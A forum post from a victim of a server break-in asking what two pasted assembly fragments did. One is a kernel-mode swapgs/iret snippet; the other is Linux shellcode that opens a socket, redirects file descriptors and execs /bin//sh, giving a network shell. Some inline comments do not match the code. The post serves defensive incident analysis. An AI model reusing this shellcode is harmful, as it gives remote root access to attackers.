hello friends
i run a personal web server that recently suffered an unfortunate break-in / hacking attempt. the server that was broken into is running CentOS 6.3 (old yes i know)
i have already taken the server offline to limit further damage and penetration to my home network.
recently, while attempting to do post-mortem analysis of the attacks which were used i find some shell code.
please forgive me i am ignorant to most technical code (also my english still very bad). my work friend help me to decrypt these shell codes. he says they are assembly but i know very little about assembly language programming so i come here to ask you if these programs look bad to you?
can some assembly guru here please tell me what these codes were used to do to my webserver ? i am pretty sure they broke into root account. and i have unplugged this machine so no more damage can be done.
but still i would like to know HOW they did it, and what the assembly programs exploited. so that i can better protect my server in the future.
thank you all much !!
assembly codes below.
Code:
program 1:
------SNIP--------
.data:0x00000000 0f01f8 swapgs
.data:0x00000003 e805000000 call func_0000000d
.data:0x00000008 0f01f8 swapgs
.data:0x0000000b 48 dec eax
.data:0x0000000c cf iret
------SNIP--------
program 2:
------SNIP--------
.data:0x00000000 31c0 xor eax,eax
.data:0x00000002 31db xor ebx,ebx
.data:0x00000004 31c9 xor ecx,ecx
.data:0x00000006 31d2 xor edx,edx
.data:0x00000008 b066 mov al,0x66
.data:0x0000000a b301 mov bl,0x1
.data:0x0000000c 51 push ecx
.data:0x0000000d 6a06 push 0x6
; char* dst = arg[0]
.data:0x0000000f 6a01 push 0x1
.data:0x00000011 6a02 push 0x2
.data:0x00000013 89e1 mov ecx,esp
.data:0x00000015 cd80 int 0x80
.data:0x00000017 89c6 mov esi,eax
.data:0x00000019 b066 mov al,0x66
.data:0x0000001b 31db xor ebx,ebx
; while (c != 0)
.data:0x0000001d b302 mov bl,0x2
.data:0x0000001f 6866686653 push 0x53666866
.data:0x00000024 fec3 inc bl
.data:0x00000026 89e1 mov ecx,esp
.data:0x00000028 6a10 push 0x10
.data:0x0000002a 51 push ecx
.data:0x0000002b 56 push esi
.data:0x0000002c 89e1 mov ecx,esp
.data:0x0000002e cd80 int 0x80
.data:0x00000030 31c9 xor ecx,ecx
.data:0x00000032 b103 mov cl,0x3
.data:0x00000034
.data:0x00000034 loc_00000034:
┏▶ .data:0x00000034 fec9 dec cl
┃ .data:0x00000036 b03f mov al,0x3f
┃ .data:0x00000038 cd80 int 0x80
┗ .data:0x0000003a 75f8 jne loc_00000034
.data:0x0000003c 31c0 xor eax,eax
.data:0x0000003e 52 push edx
.data:0x0000003f 686e2f7368 push 0x68732f6e
.data:0x00000044 682f2f6269 push 0x69622f2f
.data:0x00000049 89e3 mov ebx,esp
.data:0x0000004b 52 push edx
.data:0x0000004c 53 push ebx
.data:0x0000004d 89e1 mov ecx,esp
.data:0x0000004f 52 push edx
.data:0x00000050 89e2 mov edx,esp
.data:0x00000052 b00b mov al,0xb
.data:0x00000054 cd80 int 0x80
------SNIP--------
thank you all and well wishes!